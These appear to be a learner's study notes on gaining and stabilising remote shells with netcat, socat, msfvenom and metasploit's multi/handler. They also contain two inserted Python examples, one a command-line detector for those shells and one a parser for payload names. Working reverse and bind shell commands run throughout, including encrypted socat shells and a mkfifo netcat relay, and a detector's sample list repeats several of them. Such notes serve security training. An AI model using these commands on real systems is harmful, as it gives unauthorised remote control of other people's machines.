What the Shell
Tools
- variety of tools that can be used to receive reverse shells
- netcat
- basic tasks like banner grabbing
- but also receive reverse shells and connect to remote ports attached to bind shells
- very unstable, easy to lose by default, can be improved
- socat
- more features than netcat
- usually more stable than netcat by default
- more difficult syntax, and socat is rarely installed by default
- metasploit multi/handler
- exploit/multi/handler module in metasploit, fully fledged way to obtain stable shells with a wide variety of options
- only way to interact with a meterpreter shell
- easiest way to handle staged payloads
- msfvenom
- shipped as a standalone tool, but part of metasploit
- can generate payloads on the fly
- others
Types of Shell
Reverse Shell
- target is forced to execute code that connects back to your computer
- need to use tools on own computer to set up a listener to receive the connection
- good way to bypass firewall rules, but need to configure own network to accept the connection
Bind Shell
- code executed on target starts a listener attached to a shell directly on the target
- port opened up to the internet, can connect to that port and execute code
- does not require configuration of own network, but may be blocked by the target firewall
Netcat
- reverse shells
- listener
nc -lvnp <port>
# -l: listen
# -v: verbose output
# -n: don't resolve hostnames or DNS
# -p: port to listen on; have to use sudo when choosing a port below 1024, but well known ports make it more likely to get around a firewall
- bind shells
- connect to listener on target
nc <target ip> <port on target>
Netcat Shell Stabilisation
python
- linux only, since python is almost always installed by default
# use python to spawn a better featured bash shell
python -c 'import pty;pty.spawn("/bin/bash")'
# gives access to commands like clear
export TERM=xterm
# background the shell using ctrl z
# in own terminal:
stty raw -echo; fg # turns off own terminal echo, foregrounds target shell to enable tab completion and everything else
# if target shell dies there is no output in own terminal; run reset to fix
rlwrap
- gives access to history, tab completion and arrow keys upon receiving a shell
- much more useful on windows
- to use, call
rlwrap nc -lvnp <port>
socat
- limited to linux targets, no more stable than netcat on windows targets
- requires transfer of a statically compiled socat binary to the target
- webserver on attack machine, e.g.
sudo python -m http.server 80
- start webserver on attack machine, then wget the binary on the target
Change Terminal TTY Size
# open another terminal and run
stty -a
# note down rows and columns
# in reverse/bind shell type
stty rows <rows>
stty cols <cols>
Socat
- connector between two points
Reverse Shell
# basic reverse shell listener
socat TCP-L:<port> -
# result is unstable shell
# on windows, use this to connect back
# pipes used to force powershell to use unix style standard input and output
socat TCP:<local ip>:<local port> EXEC:powershell.exe,pipes
# on linux
socat TCP:<local ip>:<local port> EXEC:"bash -li"
Bind Shell
# listener on linux
socat TCP-L:<local port> EXEC:"bash -li"
# listener on windows
socat TCP-L:<local port> EXEC:powershell.exe,pipes
# on attack machine
socat TCP:<target ip>:<target port> -
Fully Stable Linux TTY Reverse Shell
- only works on linux targets
- very stable
# listener
socat TCP-L:<port> FILE:`tty`,raw,echo=0
# connects two points: the listening port and a file, using the current tty as the file and setting echo to zero
# on target (must have socat installed), connect back with
socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
# links up with the listener on the attack machine: creates an interactive bash session, allocates a pseudoterminal, shows error messages in the shell, passes ctrl c to the subprocess, creates the process in a new session, stabilises the terminal by "normalising" it
Socat Encrypted Shells
# first need to create certificate
openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
# creates 2048 bit rsa key with matching cert file, questions can be filled in or left blank
# merge cert and key file into .pem file
cat shell.key shell.crt > shell.pem
# when setting up reverse shell use
socat OPENSSL-LISTEN:<port>,cert=shell.pem,verify=0 -
# uses the generated certificate; verify=0 means don't validate the peer certificate
# to connect back
socat OPENSSL:<local ip>:<local port>,verify=0 EXEC:/bin/bash
# same applies to bind shell
# target machine
socat OPENSSL-LISTEN:<port>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes
# attack machine
socat OPENSSL:<target ip>:<target port>,verify=0 -
Common Shell Payloads
- some versions of netcat have the -e option to start a process on connection:
nc -lvnp <port> -e /bin/bash
# executes a bind shell on connection; mostly only works on windows, linux requires this code to create a listener for a bind shell:
mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f
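A defender-side companion to the netcat, socat and mkfifo commands above, added here as an example that is not part of these notes, of netcat or of socat: it runs a handful of regex rules over constructed process command lines (the kind collected from auditd execve records or an EDR process log) and reports which shell pattern each suspicious line matched. The sample command lines and the IP/port values in them are constructed.

```python
"""Flag process command lines that match the reverse/bind shell patterns from these notes.

Added detection example (not part of the notes, netcat, or socat). The input is a
constructed list of command lines of the kind a defender would pull from auditd
execve records or an EDR process log; none of it is real captured data.
"""
import re

# Constructed sample input: a mix of benign commands and the shell commands
# covered in the notes (netcat -e, mkfifo relay, socat EXEC, python pty, socat OPENSSL).
SAMPLE_CMDLINES = [
    "/usr/bin/python3 -m http.server 8080",
    "nc -lvnp 4444 -e /bin/bash",
    "sh -c mkfifo /tmp/f; nc 10.0.0.5 4444 < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f",
    "socat TCP:10.0.0.5:4444 EXEC:bash -li,pty,stderr,sigint,setsid,sane",
    'python -c import pty;pty.spawn("/bin/bash")',
    "socat OPENSSL:10.0.0.5:443,verify=0 EXEC:/bin/bash",
    "bash -c ls -la /var/log",
    "ssh -p 22 user@host",
]

# Detection rules: (rule name, compiled regex). Each mirrors one command shape from the notes.
RULES = [
    ("netcat -e shell", re.compile(r"\bnc\b.*\s-e\s+\S*(sh|cmd|powershell)")),
    ("mkfifo netcat relay", re.compile(r"mkfifo\s+\S+.*\bnc\b.*\|\s*/bin/sh")),
    ("socat EXEC shell", re.compile(r"\bsocat\b.*EXEC:\S*(bash|sh|cmd\.exe|powershell)")),
    ("python pty spawn", re.compile(r"pty\.spawn\(")),
    ("socat TLS without verification", re.compile(r"\bsocat\b.*OPENSSL(-LISTEN)?:\S*verify=0")),
]


def classify(cmdline: str) -> list[str]:
    """Return the names of all rules that match a single command line, in rule order."""
    return [name for name, pattern in RULES if pattern.search(cmdline)]


def scan(cmdlines) -> dict[str, list[str]]:
    """Map each suspicious command line to the rules it triggered; benign lines are omitted."""
    hits = {}
    for line in cmdlines:
        matched = classify(line)
        if matched:
            hits[line] = matched
    return hits


if __name__ == "__main__":
    for line, rules in scan(SAMPLE_CMDLINES).items():
        print(f"{', '.join(rules)}: {line}")
```

These are plain string matches on the command line, so a renamed binary or a differently quoted invocation slips past them; in a real pipeline they belong next to signals the text itself mentions, such as a shell process whose standard streams are a network socket, or an unexpected outbound connection from a web server process.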
msfvenom
Standard syntax
msfvenom -p <payload> <options>
Example to generate a windows x64 reverse shell in exe format
msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>
- staged
- sent in two parts
- stager
- executed directly on server itself
- connects back to waiting listener
- doesn't actually contain any reverse shell code
- connects to the listener to load the real payload, executing it directly and preventing it from touching the disk
- requires special listener
- stageless
- more common
- entirely self contained
- immediately sends shell back to waiting listener upon execution
Payload Naming Conventions
<OS>/<arch>/<payload>
e.g. shell_reverse_tcp, with an underscore _, means it's a stageless payload
shell/reverse_tcp is the staged payload equivalent, denoted with a forward slash /
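The staged/stageless naming rule above, as an added Python example that is not part of these notes or of metasploit: it splits a payload name into OS, architecture and payload and reports whether the payload is staged. The set of architecture tokens is an assumption used to tell the optional architecture component from the payload; a name with no architecture component (for example windows/shell_reverse_tcp) is treated as having none. The stageless_equivalent helper simply applies the notes' slash-to-underscore rule and does not check that metasploit actually ships the resulting payload.

```python
"""Parse metasploit/msfvenom payload names of the form <OS>/<arch>/<payload>.

Added example, not part of metasploit. The rule implemented is the one from the
notes: an underscore between the two halves of the payload name means stageless,
a forward slash means staged (stager + stage, which needs multi/handler).
"""
from dataclasses import dataclass
from typing import Optional

# Assumption: architecture tokens that can appear in the second position.
# The arch component is optional; metasploit omits it for 32-bit x86 windows
# payloads such as windows/shell_reverse_tcp.
KNOWN_ARCHS = {"x86", "x64", "aarch64", "armle", "mipsle", "mipsbe", "ppc"}


@dataclass(frozen=True)
class PayloadName:
    os: str
    arch: Optional[str]
    payload: str   # e.g. "shell/reverse_tcp" (staged) or "shell_reverse_tcp" (stageless)
    staged: bool   # True when the payload half uses a slash


def parse_payload_name(name: str) -> PayloadName:
    """Split a payload name into its components and classify it as staged or stageless."""
    parts = [p for p in name.strip().split("/") if p]
    if len(parts) < 2:
        raise ValueError(f"unrecognised payload name: {name!r}")
    os_name = parts[0]
    rest = parts[1:]
    arch = None
    if rest[0] in KNOWN_ARCHS:
        arch = rest[0]
        rest = rest[1:]
    if not rest:
        raise ValueError(f"payload name has no payload component: {name!r}")
    # Staged payloads keep a slash between stager and stage: shell/reverse_tcp.
    # Stageless payloads join the two halves with an underscore: shell_reverse_tcp.
    payload = "/".join(rest)
    staged = len(rest) > 1
    return PayloadName(os=os_name, arch=arch, payload=payload, staged=staged)


def stageless_equivalent(name: str) -> str:
    """Apply the notes' rule in reverse: turn the stager/stage slash into an underscore.

    A stageless name is returned unchanged. Only the naming rule is applied; whether
    metasploit ships the resulting payload is not checked (assumption).
    """
    p = parse_payload_name(name)
    if not p.staged:
        return name
    prefix = [p.os] + ([p.arch] if p.arch else [])
    return "/".join(prefix + [p.payload.replace("/", "_", 1)])


if __name__ == "__main__":
    for n in ("windows/x64/shell/reverse_tcp", "linux/x86/shell_reverse_tcp", "windows/shell_reverse_tcp"):
        p = parse_payload_name(n)
        print(f"{n}: os={p.os} arch={p.arch} payload={p.payload} staged={p.staged}")
```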
Metasploit multi/handler
- open
msfconsole
use multi/handler
- need to set three options
- payload
set PAYLOAD <payload>
- LHOST, on which address to listen
set LHOST <listen address>
- LPORT, on which port to listen
set LPORT <listen port>
- when everything is set, run the exploit using
exploit -j
# -j runs the job in the background